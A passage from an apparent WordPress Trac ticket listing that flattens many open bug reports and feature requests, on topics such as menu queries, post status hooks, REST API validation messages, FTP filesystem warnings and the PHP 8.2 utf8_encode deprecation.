another position (don't really know where...) - Make `recurse_dirsize` a pluggable function to replace it completely Thanks a lot! " janthiel Future Releases 56154 pre_get_posts fix to show menu on CPT Archives broken in 6.0 Menus 6.0 normal normal Awaiting Review defect (bug) new dev-feedback 2022-07-05T20:21:23Z 2022-07-07T14:37:51Z "Before WP 6.0 we have had to add this pre_get_posts fix to show the wp_nav_menu on custom post type archive and taxonomy pages: https://casabona.org/2015/03/fix-wp_nav_menu-custom-type-archives-wordpress/ {{{ function fix_nav_menu( $query ) { if ( $query->get( 'post_type' ) === 'nav_menu_item' ) { $query->set( 'tax_query', '' ); $query->set( 'meta_key', '' ); $query->set( 'orderby', '' ); } } add_action( 'pre_get_posts', 'fix_nav_menu' ); }}} Here is an example of the menu not showing on the CPT taxonomy page: **Link to production website removed, development example link is below.] There is a bug in 6.0 that when this is in the functions.php file the WP menu adds every menu item and other wp nav menus to each wp nav on both the backend in the menu editor and the frontend of the site. Makes for a very large menu anywhere a wp menu is called. Example of the broken menu: https://acbase.wpengine.com/" joshpaynedesigns Future Releases 55535 Pre-populate Image Alt Text field with IPTC Photo Metadata Standard Alt Text joedolson* Media normal minor Future Release enhancement accepted dev-feedback 2022-04-05T21:45:25Z 2024-02-05T20:52:37Z "The IPTC Photo Metadata Standard includes the ability to embed Alt Text with a photo. Seems like it would be helpful if WordPress would check for this data when an image is uploaded, and, if it exists, pre-populate the Alt Text field with it. I could see this being especially useful for site owners who purchase stock photography; if the alt text is embedded with those images, it would save the site owner time, and it would also help ensure that an Alt Text itself is added -- and is an accurate description of the image (assuming the photographer or stock photo site actually enters a good description!). http://www.iptc.org/std/photometadata/specification/IPTC-PhotoMetadata#alt-text-accessibility" eatingrules Future Releases 44349 Posts show up multiple times in backend when they have the exact same date Query 4.9.6 normal normal Awaiting Review defect (bug) new dev-feedback 2018-06-11T15:46:38Z 2022-02-09T08:19:52Z When I import for example 200 posts with the Import WordPress tool and then go to wp-admin>posts, the posts show up in the query multiple times (for instance on page 1 and page 2). Seems like others are left out. wzshop Future Releases 27494 Posts page appears into search results Posts, Post Types 3.8.1 normal normal Future Release defect (bug) new close 2014-03-23T14:27:23Z 2020-03-03T22:50:07Z "Hi, if you set a static home page, so then a page for posts, this page is just a virtual page, because it doesn't have any content, just the title. But, if you search on the site for this title, the virtual page will be shown as search result. In my opinion this should be hidden." SGr33n Future Releases 41445 post_parent can prevent media from embedding correctly adamsilverstein Media 4.9.4 normal normal Future Release defect (bug) reopened needs-unit-tests 2017-07-26T06:29:28Z 2024-01-26T07:46:47Z "If media is uploaded for a post, then used as a featured image on another post, and the original parent is not accessible via the REST API (e.g. because it's in the trash, not published etc), then it cannot be embedded on the post that ''is'' accessible. To reproduce * make a new post with a featured image * trash the post * make a new post, using the first image as the featured image * request the second post over the rest API with media embedding enabled The media will not be embedded, instead a forbidden result will be embedded error {{{#!json { ""wp:featuredmedia"":[ { ""code"":""rest_forbidden"", ""message"":""You don't have permission to do this."", ""data"":{ ""status"":403 } } ] } }}} See https://github.com/WP-API/WP-API/issues/2596 for the original issue. Also related is https://core.trac.wordpress.org/ticket/30691. " loboyle Future Releases 53418 Post Status Transition missing Hook Posts, Post Types 5.7.2 normal blocker Awaiting Review defect (bug) new dev-feedback 2021-06-15T23:42:17Z 2021-06-15T23:42:17Z "REF: https://codex.wordpress.org/Post_Status_Transitions So I have been testing this and found there is an issue creating the post type **new to pending**: {{{#!php <?php // Sends a notification when a new Event type post is created from New to Pending. function on_new_pending_post( $post ) { // A function to perform when a pending post is published. // Send an email: } add_action( 'new_to_pending', 'on_new_pending_post', 10, 1 ); }}} This code above will run on both status changes from **new to draft** and **new to pending** we have a form in which people submit new posts, these posts can be saved as a draft before being saved to pending status. We need to send an email when a status is changed from **new to pending** and **draft to pending** however we don't want an email to send from **new to draft** but using the above code hook will still send an email We have attempted to use {{{#!php <?php function post_new_pending( $new_status, $old_status, $post ) { if ( $old_status == 'new' && $new_status != 'pending' ) { // A function to perform actions when a post status changes from publish to any non-public status. // send email } } } add_action( 'transition_post_status', 'post_new_pending', 10, 3 ); }}} have tried with the $old_status set to empty or set to 'new' but this doesn't fire our code off. we can simulate the status change from draft to pending correctly using {{{#!php <?php function post_draft_pending( $new_status, $old_status, $post ) { if ( $old_status == 'draft' && $new_status != 'pending' ) { // A function to perform actions when a post status changes from publish to any non-public status. } } } add_action( 'transition_post_status', 'post_draft_pending', 10, 3 ); }}} There doesn't seem to be a way to using **new to pending** even when using the hook new_to_pending it will also effect new to draft status changes. " brettrans Future Releases 36324 Post status labels use inconsistent grammar Posts, Post Types normal normal enhancement new dev-feedback 2016-03-25T05:57:25Z 2019-06-04T20:56:27Z "Our post status labels switch back and forth between being verbs, adjectives, or potentially past-participles: * All * Mine * Published * Scheduled * Drafts * Trash I'd like to suggest we tidy these up. Maybe something like: * All * Authored (I don't love this, but you get the idea) * Published * Scheduled * Drafted * Trashed " johnjamesjacoby Future Releases 34822 Post name permalinks problems Permalinks 4.3.1 normal normal defect (bug) new dev-feedback 2015-12-01T16:41:16Z 2019-06-04T20:53:19Z " When using the ""post name"" permalink options and creating/deleting duplicates it can happen that the links get confused and the correct permalink doesn't work anymore. (page not found) The workaround shows a little more of this strange behaviour. If you change the link of the old page to blog/pagename-2, create a new one (with changing the link to the correct/old one if necessary), and delete the old one, the permalink blog/postname works, but redirects to blog/pagename-2. Something gets mixed up there... --- To add another workaround that we've tried to fix it: If one changes the permalink setting to standard, the post show up as normal, but when changing the settings back (to ""article name""), the problem persists/reappears. The permalinks do not seem to be freshly generated but rather to somehow half-and-half rely on old and new setting, very weird. " stevenbauers Future Releases 59610 Post modified date cannot be updated through WP-CLI Posts, Post Types 6.3.3 normal normal Awaiting Review defect (bug) new dev-feedback 2023-10-13T08:43:40Z 2023-10-13T19:50:31Z "As we all know, we can update post data using WP-CLI `wp post update <post-id>`, but if we try to update post-modified-date using the same CLI, the post gets updated with the current date-time rather than the passed date-time. This CLI uses `wp_update_post()` in its implementation, so to fix this, we need to update its implementation or update the documentation of the CLI which will explain that post-modified-date cannot be updated through CLI. Steps to reproduce this bug: 1. Open the post on REST endpoint where **post-modified-date** will be visible. (for e.g. https://example.com/wp-json/wp/v2/posts/1 ) 2. Run the WP-CLI to update the post-modified-date: `wp post update <post-id> --post_modified='2023-10-13T10:18:04'` and reload the REST endpoint url." shreyasikhar26 Future Releases 56593 Post meta validation error messages are not helpful to end users REST API 6.0.2 normal normal Awaiting Review feature request new dev-feedback 2022-09-17T07:06:47Z 2022-09-17T07:06:47Z "The meta error messages generated by the validate callback are not helpful to the end user. For example, if we register a meta field with the following: {{{ register_post_meta( $post_type, 'author_url', array( 'type' => 'string', 'show_in_rest' => array( 'single' => true, 'schema' => array( 'type' => 'string', 'pattern' => 'https:\/\/.+', ), ) ) ); }}} An incorrectly formatted field would yield the following error message in the Gutenberg editor: {{{ Updating failed. meta.author_url does not match pattern https:\/\/.+. }}} As far as I can tell, the only way I can see currently to filter the message is to crudely hook into `rest_post_dispatch` and string replace the error message. I may be wrong. Perhaps there is some way to conveniently do this on the client side with the notice date store selectors / actions, but since the meta fields are registered server side, it seems like it would be more convenient to filter the output of `rest_validate_value_from_schema` to customize the error messages I'd like to request a `rest_validate_value_from_schema` filter. " andrewleap Future Releases 47554 Post history Editor 5.1.1 normal major Future Release defect (bug) new dev-feedback 2019-06-18T10:11:49Z 2020-11-24T04:07:38Z "Hello everybody. This ""bug"" might be a timeout issue or might have something to do with the server times, but it could be fixed from software side, as far as I see it. It also might be a Gutenberg issue, but its look like it is from the core. Classic: - User A opens the post and write some content. - User B also opens the same post an clicks on take over. - User A gets pop up with info about the take over and can go to ""all posts"" Problem (Version 5.1.1): 1. Popup for user comes to late -> content not saved 2. Popup doesn't appear -> user saves post which will be override from user B's content. Solution: 1. auto save e.g. every 10 seconds 2. History besides the post, e.g. on the very right column. History contains lets say the last 5 or 10 (configurable) versions of the post. Users can see a diff or can restore the whole last version of the entry. - History doesn't contains versions of auto save (only last auto save) --- User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2018.11 Safari/537.36 Chrome/71.0.0.0 " d3n15 Future Releases 23863 Post Formats: allow filtering content_width per format in wp-admin Post Formats normal normal defect (bug) new dev-feedback 2013-03-25T20:55:33Z 2019-06-04T20:43:59Z "On front-end a theme can filter {{{$content_width}}} like so: {{{ function twentythirteen_content_width() { if ( has_post_format( 'image' ) || has_post_format( 'video' ) ) { global $content_width; $content_width = 724; } } add_action( 'init', 'twentythirteen_content_width' ); }}} But ... functions called in wp-admin that use the global {{{$content_width}}} variable won't be changed. For example, using trunk and Twenty Thirteen theme: 1. Create a new post, set to Image post format 2. Click Add Media to insert an image 3. Upload an image at least 800 px wide 4. You'll see in ""Attachment Display Settings"" that width for the ""large"" size to insert to the post is 604 pixels and not 724. Also, even if detecting a Post Format this way worked correctly on edit, it wouldn't work on first post creation because of how the UI uses JS to switch between the formats." lancewillett Future Releases 48512 Post editor can show wrong author, if user role was changed Posts, Post Types normal normal Awaiting Review defect (bug) new dev-feedback 2019-11-06T14:29:47Z 2019-11-06T17:23:53Z "* Go to Add New User. Create a new user who is a Contributor. * Go to Add New Post. Type any random text as the content. Set the Author (in the dropdown list) to the author you just created. Save the post. * Go to the user you created, and change their role to ""No role"". * Go back to Posts, and find the post you created. Edit it. * Observe that the Author dropdown now shows the wrong author, since the user is no longer eligible to appear in the dropdown list. * Fortunately, even if you edit and save the post, it does not actually overwrite the correct author with the wrong one. Still, the display is very misleading. A bug in my opinion." equin0x80 Future Releases 58034 Post API can't get image URL on Endpoint REST API 6.2 normal normal Awaiting Review feature request new dev-feedback 2023-03-31T11:05:42Z 2023-04-06T10:09:15Z "We need to add the featured image URL to the endpoint of the POST API Instead of getting the featured_media id, we should get the attachment URL, which will be better for everyone" nodeweb Future Releases 39261 Possible wrong base color for admin SVG-icons Administration 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2016-12-13T09:27:44Z 2024-02-26T22:38:20Z "Hello! I'm currently working with custom SVG icons for my custom post types, but i can see that these icons have a slightly different color than the native dashicons. It seems like the SVG-painter paints my SVG-icons in the wrong base-color. I'm using the default theme ""fresh"" and the base is set to `#82878c`. If i change to for example `#9EA3A8` my SVG-icons looks more like the native dashicons. Maybe the basecolor is a bit off? File: [https://core.trac.wordpress.org/browser/branches/4.7/src/wp-includes/general-template.php#L3428 wp-includes/general-template.php:3428] I can also see that this affects the SVG in other plugins (Yoast SEO, WPML etc.). Best regards, Robert Sather." robsat91 Future Releases 58152 Possible variable re-use mujuonly Users 6.3 normal normal Awaiting Review enhancement assigned dev-feedback 2023-04-18T10:22:04Z 2023-04-19T23:33:40Z The variable `$spam` is defined in the line 2228 in wp-includes/user.php and we can re-use the same variable in the line 2463 and 2646 mujuonly Future Releases 40523 populate_options doesn't use correct add_options actions Options, Meta APIs 1.5 normal normal Awaiting Review enhancement new dev-feedback 2017-04-21T23:17:27Z 2017-05-02T20:15:25Z populate_options is a special function, used to populate default option in the options table. To populate the options table, a single (and large) insert is used. Because the add_option isn't used, it means none of that functions actions are run. spacedmonkey Future Releases 29299 Plural forms not available for some strings SergeyBiryukov Options, Meta APIs normal normal Future Release defect (bug) reviewing dev-feedback 2014-08-21T09:55:42Z 2020-02-06T19:46:51Z "There are several strings which do not allow specific plurals in Settings - Reading. `<?php _e( 'posts' ); ?>` `<?php _e( 'items' ); ?>` It looks strange when somebody inserts for example number 4 and our plural form is translated only for number 5. Best solution would be probably some kind of string ""Number of posts on page"" (without ending ""posts"" string). But I am not sure about it... See: https://core.trac.wordpress.org/browser/trunk/src/wp-admin/options-reading.php#L126" pavelevap Future Releases 53149 Plugins: Consider using `block.json` file as an entry point for blocks from Block Directory Plugins normal normal feature request new dev-feedback 2021-05-04T07:51:05Z 2022-02-18T15:41:21Z "The original discussion sparked by a comment from @jipmoors on GitHub in https://github.com/WordPress/gutenberg/pull/13693#issuecomment-477904539: > WordPress automatically discovers all the block.json files in the plugin/core blocks folder and registers the corresponding block types. These block types are made available through the block registry (https://developer.wordpress.org/reference/classes/wp_block_type_registry/) PHP class, and the blocks scripts and styles are added as dependencies to the wp-block-library script and style handles. At the moment, it's mandatory to create the PHP file for the plugin that contains only a single block type registration code when developing for Block Directory. Those plugins rarely have PHP code, so we could simplify the flow for developers by making it possible to use `block.json` to source all required metadata. If the current metadata schema doesn't contain some fields that can be declared only in the PHP comment (some are duplicated in `readme.txt`, we can always include it in `block.json`. In the case when developers would like to use the `render_callback`, they could use the concept proposed in #53148 - the `renderTemplate` file reference in `block.json`. This way, the process of validation of block types submitted to Block Directory would get further simplified." gziolo Future Releases 18501 plugin_dir_path() returns unsanitized path on Windows installs Plugins 2.8 normal normal defect (bug) new dev-feedback 2011-08-23T18:40:29Z 2019-06-04T20:42:11Z "Currently plugin_dir_path() only returns the result of dirname( $file ), which can produce mixed results on local Windows installations. Attached patch takes pieces from plugin_basename() and plugins_url() to guarantee a working and accurate plugin directory path is returned in all operating systems. See #BB1596 (and associated revisions) for back-story." johnjamesjacoby Future Releases 59182 Plugin/theme zip update screen max-width Upgrade/Install 5.5 normal minor Awaiting Review enhancement new dev-feedback 2023-08-24T09:55:54Z 2023-08-26T05:22:21Z "Hi, Can we set the max-width to 100rem instead of 40rem? Current CSS for wrap class. {{{ .update-php .wrap { max-width: 40rem; } }}} it should be {{{ .update-php .wrap { max-width: 100rem; } }}} let me know if this makes sense or not, please. For more information see mentioned screenshot below. " sumitsingh Future Releases 34052 Plugin-Install/Update Sections Plugins 4.3.1 normal normal Awaiting Review defect (bug) new dev-feedback 2015-09-28T08:16:47Z 2023-05-13T19:05:15Z "Hey WP-Community, I've found out that some plugins producing ""Cannot use object of type stdClass as array"" fatal errors when there is an update-notification and one clicks on the ""View version x.x.x details"" link. After the plugin information window pops up WordPress is not able to read the sections. In most cases this is caused by external plugins, I guess. However I was confisued to see that WordPress is doing a type casting already but not everywhere needed. Everything starts in the file [https://core.trac.wordpress.org/browser/tags/4.3.1/src/wp-admin/includes/plugin-install.php#L395 wp-admin/includes/plugin-install.php on line 395]. In this line the parameter ""sections"" from $api object is casted as an array. However a line later it's assumed that the parameter is an array already. Here is the code snippet: {{{ foreach ( (array) $api->sections as $section_name => $content ) { $api->sections[$section_name] = wp_kses( $content, $plugins_allowedtags ); } }}} The same problem appears on [https://core.trac.wordpress.org/browser/tags/4.3.1/src/wp-admin/includes/plugin-install.php#L408 line 408]. Wouldn't it be better to cast the parameter before everything happends? This would also avoid to type-cast the same parameter over and over again, see attached patchfile. {{{ $api->sections = (array) $api->sections; }}}" floriansimeth Future Releases 29539 Plugin viewer not displaying video tutorials. Plugins 4.0 normal normal Future Release defect (bug) new dev-feedback 2014-09-05T16:19:32Z 2017-05-05T20:25:17Z "In the WordPress 4.0 plugin page viewer, my video tutorials for my plugins are not displaying. [[Image(http://www.redeemerdanceacademy.ca/wp-content/uploads/2014/09/Ticket.png)]]" kidsguide Future Releases 27670 Plugin Information tab - inaccesible without install_plugin capability Role/Capability 3.8.1 normal normal defect (bug) new dev-feedback 2014-04-04T14:01:03Z 2019-06-04T21:10:44Z "Hello, if I understand it correctly through the '''Plugin information tab''' you can also install/update plugins. But if you permit installing plugins with f.e. with add_cap(""install_plugins"", FALSE) to some user, whole '''Plugin information tab''' is '''unusable''' for him, so you cant view details, install update even if you are allowed to. I suppose the problem is in wp-admin/plugin-install.php where is {{{ if ( ! current_user_can('install_plugins') ) wp_die(__('You do not have sufficient permissions to install plugins on this site.')); }}} so maybe extending the condition above to something like this {{{ if (( ! current_user_can('install_plugins') ) && plugin_not_installed($plugin_name)) }}} could help? Thanks Jozef Repáň " FolioVision Future Releases 22287 Plugin in another plugin folder causes Activate link to be wrong on Download Upgrade/Install 3.4 normal normal Awaiting Review defect (bug) new dev-feedback 2012-10-26T15:30:52Z 2020-09-17T21:35:15Z "I am not sure if shipping a plugin within another plugin is officially supported, but there is an inconsistency between the activate links in the Manage Plugins page, and the Activate Plugin on the Plugin Downloaded success page. This is because on the Manage Plugins page, the `get_plugins()` is going to scan the plugins dir and all dirs within it, however, on the Upgrade page, it calls `get_plugins()` specifying the plugin dir as the base (see https://github.com/WordPress/WordPress/blob/master/wp-admin/includes/class-wp-upgrader.php#L579) That will cause the ""embedded"" plugin to be picked up, and if it's alphabetically above the main plugin file (presumably) see code comment "" //Assume the requested plugin is the first in the list""" joehoyle Future Releases 60692 Plugin dependencies: Allow a mu-plugin to fulfil a dependency Upgrade/Install trunk normal normal 6.6 enhancement new dev-feedback 2024-03-05T10:59:05Z 2024-03-05T12:00:04Z "See discussion on #60504 for background. An inactive plugin that has a dependency that is fulfilled by a mu-plugin is prevented from being activated as its dependency is considered unfulfilled. It should be possible for a mu-plugin to fulfil a plugin dependency. It may be that a new filter or a default mu-plugin loader needs to be introduced so facilitate this." johnbillion Future Releases 50674 Plugin and Theme Update Hooks pbiron* Upgrade/Install normal normal Future Release enhancement accepted dev-feedback 2020-07-15T22:48:19Z 2020-10-19T18:10:59Z With plugin and theme auto-updates shipping with core in 5.5, I think it's worth considering adding some more hooks around the plugin and theme process to perhaps run prior to and after a particular update is run. Hooks like `plugin_updated` and `theme_updated`, and maybe some `pre_*` versions of those. davidbaumwald Future Releases 20214 Pingback discovery doesn't strip fragment identifiers from URL Pings/Trackbacks 3.3 normal normal defect (bug) new dev-feedback 2012-03-11T08:34:46Z 2019-06-04T20:42:58Z "To reproduce: 1. Insert a link containing a fragment identifier into a post, e.g., `http://localhost/wp/helloworld/#comments`. 2. Save post. 3. Observe the URL which !WordPress attempts to retrieve in `discover_pingback_server_uri()` - the requested path contains the `#fragment_identifier`, which it shouldn't, and in most cases will result in a 404, thus the pingback fails." solarissmoke Future Releases 31977 "Ping status of pages changes to ""closed"" in quick edit" pareshradadiya Posts, Post Types 4.2 normal normal Future Release defect (bug) assigned dev-feedback 2015-04-15T11:14:50Z 2022-10-14T17:26:39Z "WP version: 4.2-beta4 Every page is created with ping_status set to ""open"". If the page is edited in the ""full"" edit form, the ping_status remains untouched. However, if the page is edited in the quick edit form, the ping_status field is changed to ""closed"" since WP 4.2. Since pages don't support the ping functionality, I suppose it shouldn't change the field. Maybe ""closed"" is the propper one, but it should be set on the creation. It makes testing of our plugin a little bit tricky. Thanks. Jan" JanVoracek Future Releases 39237 PHPunit coverage reports fail if the is out to the stdout or header Build/Test Tools normal normal Future Release defect (bug) new dev-feedback 2016-12-11T18:03:15Z 2020-03-21T23:17:25Z "trying to get the coverage report to work :-) https://phpunit.de/manual/current/en/textui.html and their error due to the ech statements in the phpunit `install.php` and `bootstrap.php` i.e. {{{#!php <?php echo ""Installing..."" . PHP_EOL; }}} and due to the header value been set in `wp_redirect()` in `pluggable.php` why this is running for unittest ??? it looks like we need to test for if a coverage report is been created and not echo to the console " pbearne Future Releases 48689 PHP warnings after updating to WP 5.3: ftp_nlist() and ftp_pwd() expect missing parameters costdev Filesystem API 5.3 normal minor 6.6 defect (bug) assigned needs-unit-tests 2019-11-17T23:24:37Z 2024-02-06T05:48:16Z "I updated several websites to WP 5.3 without any problems. But on one wesite I got these PHP warnings both in the backend and in the website: {{{ Warning: ftp_nlist() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 402 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: ftp_nlist() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 402 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 681 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: ftp_pwd() expects parameter 1 to be resource, null given in /wp-admin/includes/class-wp-filesystem-ftpext.php on line 226 Warning: Cannot modify header information - headers already sent by (output started at /wp-admin/includes/class-wp-filesystem-ftpext.php:402) in /wp-includes/functions.php on line 5946 Warning: Cannot modify header information - headers already sent by (output started at /wp-admin/includes/class-wp-filesystem-ftpext.php:402) in /wp-admin/includes/misc.php on line 1252 Warning: Cannot modify header information - headers already sent by (output started at /wp-admin/includes/class-wp-filesystem-ftpext.php:402) in /wp-admin/admin-header.php on line 9 }}} I suppressed the ouput by ""muting"" the function calls with '@' in the file 'class-wp-filesystem-ftpext.php', i.e. changed {{{ftp_nlist()}}} to {{{@ftp_nlist()}}} etc.. I will be glad if any reason can be found and fixed until the next WP upgrade. " Hinjiriyo Future Releases 55328 PHP warning on rename() inside download_url() in /wp-admin/includes/file.php Filesystem API 5.9 normal normal Awaiting Review defect (bug) new dev-feedback 2022-03-07T12:34:54Z 2023-03-17T19:11:01Z "Hi, I struggle with the following warning on my WordPress site (version 5.9.0 and currently 5.9.1) whenever I update the plugins: {{{ PHP Warning: rename(/tmp/plugin-name.tmp,plugin-name.plugin-version.zip): Permission denied in /wp-admin/includes/file.php on line 1201, referer: siteURL/wp-admin/plugins.php }}} The warning is triggered by rename() function inside download_url()in /wp-admin/includes/file.php on line 1201. It's been logged on the site since support for Content-Disposition filename was added in WP 5.9: developer.wordpress.org/reference/functions/download_url/ The warning is also getting logged in WP 5.9.1. My site uses ftpext filesystem and I believe this is why 'permission denied' warning is triggered. The plugins update successfully, with no other issues, however, the above warning is logged every single time. Would it be possible to exclude Content-Disposition filename support if website uses ftpext filesystem method? " devbd Future Releases 43844 PHP list language construct changed behaviour in PHP 7 SergeyBiryukov Administration normal major Awaiting Review defect (bug) reviewing dev-feedback 2018-04-24T12:50:14Z 2018-08-12T23:04:13Z "The inline docs for the method as of 24th April, 2018: {{{#!php /** * Get a list of sortable columns. The format is: * 'internal-name' => 'orderby' * or * 'internal-name' => array( 'orderby', true ) * * The second format will make the initial sorting order be descending * * @since 3.1.0 * * @return array */ protected function get_sortable_columns() { return array(); } }}} See https://github.com/WordPress/WordPress/blob/master/wp-admin/includes/class-wp-list-table.php The problem is that if I define the sortable columns as the first one, with {{{#!php class My_List_Table extends WP_List_Table { protected function get_sortable_columns() { return array( 'my-column' => 'my-column', ); } } }}} Then the `list` call when building the table list header / footer will not have the `orderby` variable defined. See https://github.com/WordPress/WordPress/blob/master/wp-admin/includes/class-wp-list-table.php#L1117 If however I use {{{#!php class My_List_Table extends WP_List_Table { protected function get_sortable_columns() { return array( 'my-column' => array( 'my-column' ), ); } } }}} everything works as expected. Diff incoming shortly." javorszky Future Releases 55603 PHP 8.2: address deprecation of the utf8_encode() and utf8_decode() functions hellofromTonya General 6.0 normal normal 6.6 task (blessed) assigned dev-feedback 2022-04-21T19:24:21Z 2024-03-06T17:40:19Z "== Context The [https://wiki.php.net/rfc/remove_utf8_decode_and_utf8_encode PHP RFC to remove the `utf8_encode()` and `utf8_decode()` functions] from PHP in PHP 9.0 has recently been accepted. This means in effect that as of PHP 8.2, those functions will be deprecated and a deprecation notice will be thrown whenever they are called. The reasoning behind the deprecation and removal is that these functions are confusing and rarely used correctly. See the [https://wiki.php.net/rfc/remove_utf8_decode_and_utf8_encode#usage Usage section] of the RFC for an analysis of the various (mostly incorrect) uses of the functions. == The Problem The [https://wiki.php.net/rfc/remove_utf8_decode_and_utf8_encode#alternatives_to_removed_functionality typical replacements for these functions] are using the [https://www.php.net/manual/en/book.mbstring.php MBString extension] and/or the [https://www.php.net/manual/en/book.iconv.php Iconv extension]. As these extensions are both ''optional'' extensions in PHP, they cannot be relied on to be available in an open source context. WordPress uses the `utf8_encode()` function a few times in the codebase: * 1 x `utf8_encode()` in `src/wp-admin/includes/export.php` * 2 x `utf8_encode()` in `src/wp-admin/includes/image.php` * 1 x `utf8_encode()` in `tests/phpunit/tests/kses/php` Aside from that the external dependency [https://github.com/JamesHeinrich/getID3 GetID3] also uses both these functions a number of times. A search of the plugin and theme directory shows more worrying results with a plenitude of matches: * [https://wpdirectory.net/search/01G16P0SWHB37G2965MP8R4ZYK 11247 matches in 3315 plugins], including 15 plugins with over a million installs. * [https://wpdirectory.net/search/01G16P2K39TQ538M9KRTVXT4CA 40 matches in 22 themes]. == Options So, what are the options we have ? In my opinion, especially seeing how these functions are used so often in plugins, there are only two realistic options: === 1. We could polyfill these functions. While some functions which may not be available are polyfilled by WP, this is generally only done to have access to ''new'' PHP functionality or to allow for using functions which require certain optional extensions to be enabled. As far as I know, no PHP native function has ever been polyfilled due to it being removed from PHP. **Pro**: Relatively simple solution and everything keeps working (deprecation notices will still show when running on PHP 8.x, though these could silenced). **Con**: As most uses of these functions are likely to be incorrect usage (especially in plugins), these ""bugs"" will remain and not be reviewed or addressed, undercutting the improvement PHP is trying to make. === 2. We could make the MbString (or the Iconv) extension a requirement At this moment, [https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/class-wp-site-health.php#L876 both the MbString as well as the Iconv extension are recommended, but not required by WP]. A couple of MbString functions are also polyfilled in WP, so now might be a good time to make the MbString extension a requirement for WP. **Pro**: MbString being available will allow for fixing the deprecations in a forward-compatible manner. It will also allow for other code improvements to be made to improve WPs support for languages using non-latin based scripts. **Con**: A new requirement would be added to WP which should not be taken lightly. At the same time, it should be noted that MbString is generally enabled already anyway, so this will impact only a small percentage of users. ==== Why MbString instead of Iconv ? While both are included (though not enabled) by default with PHP, Iconv [https://www.php.net/manual/en/iconv.requirements.php requires the `libiconv` library], which may not be available, while MbString has [https://www.php.net/manual/en/mbstring.requirements.php no external dependencies]. MbString is [https://www.php.net/manual/en/mbstring.installation.php not enabled by default in PHP], but generally ''is'' enabled in practice. [https://www.php.net/manual/en/mbstring.installation.php Iconv is enabled by default] in PHP, but can be disabled. Having said that, MbString offers much more functionality than the limited functionality offered by Iconv and - as indicated by a number of functions being polyfilled - is already in use in WP. Still, it would be helpful if someone with access to the underlying statistics data collected by WP could add figures to this issue showing how often either extension is enabled on systems running WP. == Recommendation I'd strongly recommend option 2, but would like to hear the opinions of additional Core devs. == Action lists === General - [ ] Report the issue to GetID3 === Action list for option 1 - [ ] Polyfill the functions. - [ ] Review the uses of the functions in WP Core anyhow to see if those could/should be removed/the code using them should be refactored. - [ ] Add a note about the polyfills in a dev-note with a recommendation for plugin/theme authors to review their use of these functions anyhow. === Action list for option 2 - [ ] Make the MbString a requirement for installing WP/in the WP bootstrapping. - [ ] Change the MbString extension from optional to required in the Site Health component. - [ ] Remove the current MbString related polyfills from the `compat.php` file. - [ ] Review the uses of the functions in WP Core and replace with more appropriate alternatives. - [ ] Add a note about the deprecation in the PHP 8.2 dev-note with a recommendation for plugin/theme authors to review their use of these functions and noting that the MbString extension can be relied upon to be available (as of WP 6.1). " jrf Future Releases 50197 PHP 7.4 Compatibility with WP 5.4.1 – problem with seems_utf8() Formatting 5.4.1 normal normal Awaiting Review defect (bug) new close 2020-05-17T18:42:09Z 2022-07-29T13:13:06Z "Since I updated to PHP 7.4 I with the newest WordPress version 5.4.1 I am getting error notices when seems_utf8() from formatting.php is called with an integer as parameter. (This seems to happen when something around Buddypress (v 5.2) leads to calling this function and passes some integer id. I have not found the origin of this yet). PHP 7.3 still seems to accept that and will still interpret $str[ $i ] in line 904. From 7.4 this will lead to an error notice “Trying to access array offset on value of type int …”. In addition, after the error notice all special characters on the page rendered are not displayed correctly anymore. Can you please prevent this from happening? A line in the beginning of the function like $str = (string) $str; can fix this error notice. Maybe there is a more elegant way to prevent this, but I right now I don’t find it … Best regards Florian" fohly Future Releases 44215 Personal data exports - Empty values are included in the report Privacy 4.9.6 normal normal Awaiting Review defect (bug) new dev-feedback 2018-05-24T14:37:40Z 2019-06-03T16:42:31Z "Empty values should not be included in the report. Otherwise, the report will be cluttered with empty values. Use the following code in `mu-plugins` to reproduce: {{{ <?php function exporter_1( $email_address, $page = 1 ) { return array( 'data' => array( array( 'group_id' => 'group-1', 'group_label' => __( 'Orders', 'woocommerce-services' ), 'item_id' => 'item-1', 'data' => array( array( 'name' => __( 'Exporter 1' ), 'value' => 1234, ), array( 'name' => __( 'Exporter 2' ), 'value' => '', ), array( 'name' => __( 'Exporter 3' ), 'value' => '0', ), array( 'name' => __( 'Exporter 4' ), 'value' => 0, ), ), ) ), 'done' => true, ); } function register_exporter_1( $exporters ) { $exporters['exporter_1'] = array( 'exporter_friendly_name' => __( 'Exporter 1' ), 'callback' => 'exporter_1', ); return $exporters; } add_filter( 'wp_privacy_personal_data_exporters', 'register_exporter_1' ); }}} Results: Before proposed patch: [[Image(https://cloudup.com/iPJ8ocUnyiz)]] After proposed patch: [[Image(https://cloudup.com/i7MqWkMZjrj)]]" bor0 Future Releases 48573 Permalinks Settings screen unnecessarily calls sanitize_option( 'permalink_structure' )... Options, Meta APIs normal normal Awaiting Review defect (bug) new dev-feedback 2019-11-12T17:56:31Z 2019-11-12T23:49:29Z "...just before it calls [https://developer.wordpress.org/reference/classes/wp_rewrite/set_permalink_structure/ WP_Rewrite::set_permalink_structure()]. It is unnecessary because `sanitize_option()` will be called by the `update_option()` call in `WP_Rewrite::set_permalink_structure()` if it the value needs to be sanitized (i.e., it has changed). " pbiron Future Releases 35209 Permalinks of published pages get changed when creating new pages as a draft Permalinks 4.4 normal normal defect (bug) new dev-feedback 2015-12-23T13:14:39Z 2019-06-04T20:53:45Z "While looking over 